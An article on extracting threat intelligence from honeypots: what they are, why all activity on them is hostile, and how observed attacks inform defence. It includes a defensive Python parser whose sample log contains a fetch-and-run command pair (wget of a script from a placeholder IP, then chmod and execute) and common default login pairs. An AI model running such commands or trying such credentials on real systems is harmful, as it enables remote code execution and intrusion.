Extracting Threat Intelligence From Honeypots

by Sachin

The use of deception in warfare is nothing new, and the same principle applies to both cyber attack and cyber defense. If a cyber defender can trick a hacker into wasting their time and resources on a fake target, then the attacker has fewer resources available to exploit real targets. Additionally, the defender may have an opportunity to extract useful information (or threat intelligence) regarding the attacker’s tactics, techniques, and procedures (TTPs).

A honeypot is one of the simplest options for implementing deception within a network. Understanding what a honeypot is and how it works can help an organization collect and operationalize threat intelligence to protect against attackers targeting its network.

How Honeypots Work

In the end, a honeypot is just another computer on an organization’s network. It can be a physical device, but it is generally a virtual machine (VM) because a VM is easier to monitor and clean up. Additionally, a VM can be configured with introspection, where the host machine has full visibility into the guest VM’s activities without this monitoring being detectable to malware or a hacker operating on the VM.

However, a honeypot is unlike the rest of an organization’s systems because it is intended to be a target of attack. Honeypots are often designed to have vulnerabilities that a hacker could exploit. For example, the honeypot may run a web server that contains a command execution or SQL injection vulnerability. By designing a honeypot to be an appealing target to a hacker (by making it vulnerable to attack and appear to contain valuable data), an organization can trick an attacker into focusing their efforts on attacking it rather than targeting the rest of the company’s network.

Advantages Of Honeypots For Threat Intelligence Collection

By design, a honeypot is not part of an organization’s real network. As a result, there is no legitimate use for the honeypot, and any connections to or from the honeypot or activities performed on the honeypot are automatically suspicious or malicious.

This is extremely valuable when attempting to collect threat intelligence regarding a potential attacker. On normal systems, legitimate activities performed in the course of daily business cause a number of state changes on the machine. Differentiating a benign state change (performed by an employee) from a malicious one (performed by a hacker) can be difficult. As a result, real attacks against the system can be lost in the noise, and an organization’s security team may waste valuable time and energy investigating potential incidents that turn out to be false positives.

On a honeypot, every state change is caused by an unauthorized use of the device because no authorized uses of the device exist. This enables an organization’s security team to easily differentiate real attacks from false positive detections.

Additionally, the nature of a honeypot provides security teams with the opportunity to spend more time observing how an attacker reacts to certain situations. Since nothing important or valuable is stored on the machine, there is no risk associated with allowing a hacker to poke around inside it. It is even possible to orchestrate certain challenges for the hacker to overcome in order to force them to reveal their tools and techniques since oddities in the configuration of the machine have no impact on normal operations.

Honeypots Inform Incident Response Activities

Beyond the potential for wasting an attacker’s time, honeypots are also valuable because they can provide a preview of the types of attacks that an organization needs to be capable of defending against. The tools and techniques that a hacker uses to break into a honeypot are likely to be the same ones used to attack the rest of the network. If the honeypot is attacked first and reveals the tools in use, an organization’s security team has a window to implement any required protections before the rest of the network is at risk.
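The two points above, that every event on a honeypot is hostile by definition and that what is observed there should feed protections for the real network, can be put to work with a small intel extractor. The following is an added example, not code from the original article: it parses constructed honeypot events (JSON lines in an assumed, made-up format with the fields `ts`, `src`, `type`, `user`, `pass`, `input`) and turns them into a source blocklist, a credential audit list, observed commands and second-stage download URLs, without any benign-versus-malicious triage step.

```python
import json
from collections import Counter, defaultdict

# Constructed sample events shaped like an SSH honeypot's JSON-lines output; not real indicators.
HONEYPOT_LOG = """\
{"ts":"2024-03-01T02:14:05Z","src":"198.51.100.23","type":"login","user":"root","pass":"123456"}
{"ts":"2024-03-01T02:14:09Z","src":"198.51.100.23","type":"login","user":"admin","pass":"admin"}
{"ts":"2024-03-01T02:14:15Z","src":"198.51.100.23","type":"cmd","input":"uname -a"}
{"ts":"2024-03-01T02:14:21Z","src":"198.51.100.23","type":"cmd","input":"wget http://203.0.113.9/x.sh -O /tmp/x.sh"}
{"ts":"2024-03-01T02:14:22Z","src":"198.51.100.23","type":"cmd","input":"chmod +x /tmp/x.sh; /tmp/x.sh"}
{"ts":"2024-03-01T03:40:11Z","src":"192.0.2.77","type":"login","user":"pi","pass":"raspberry"}
"""

def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a sensor glitch must not stop intel extraction
    return events

def build_intel(events):
    """Turn raw honeypot events into operational threat intelligence."""
    # No legitimate users exist, so every source is hostile and every command is tradecraft.
    by_src = defaultdict(lambda: {"first_seen": None, "last_seen": None, "events": 0})
    creds, commands, download_urls = Counter(), [], set()
    for ev in events:
        s = by_src[ev["src"]]
        s["events"] += 1
        s["first_seen"] = min(filter(None, [s["first_seen"], ev["ts"]]))
        s["last_seen"] = max(filter(None, [s["last_seen"], ev["ts"]]))
        if ev["type"] == "login":
            creds[(ev["user"], ev["pass"])] += 1
        elif ev["type"] == "cmd":
            commands.append(ev["input"])
            for tok in ev["input"].split():
                if tok.startswith(("http://", "https://")):
                    download_urls.add(tok)
    return {
        "blocklist": sorted(by_src),            # every source seen on the honeypot
        "sources": dict(by_src),
        "credentials": creds,                   # credentials to audit on real hosts
        "commands": commands,                   # TTPs to turn into detections
        "download_urls": sorted(download_urls), # second-stage hosts to block at the proxy
    }
```

The `blocklist` and `download_urls` outputs are what a security team would push to perimeter controls ahead of the same actor reaching production systems, while `credentials` shows which weak logins to check for on real hosts.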

The same philosophy can also apply to protecting against malware attacks targeting the organization. For example, research has found that most ransomware is executed three days after the initial breach in order to hide the signs of an infection. If a honeypot is infected with the ransomware in advance of the rest of the network, the start of data encryption on the honeypot provides a warning to check the rest of the network for malware lying dormant on machines.

Using Honeypots For Proactive Cyber Defense

Many organizations are preventative and reactive in their approach to cybersecurity. A security team or security operations center (SOC) monitors for alerts that indicate that a cyberattack is potentially in progress. If the organization’s existing cyber defenses don’t block the attack, the security team can engage in incident response and remediation.

While this approach can be effective, it is also expensive and damaging to the organization. Responding to an attack only once it is in progress can mean that the damage is already done before the incident is remediated.

In many cases, proactive cyber defense activities like threat hunting require a certain level of knowledge of the organization’s environment and potential cyber threats to be effective. However, the use of a honeypot can enable an organization to be more proactive in defending against attacks without the same level of cybersecurity knowledge and experience. By deploying and monitoring a honeypot and protecting against the attacks and malware observed within the deceptive environment, a security team may be able to protect real systems before they are targeted with the same attacks.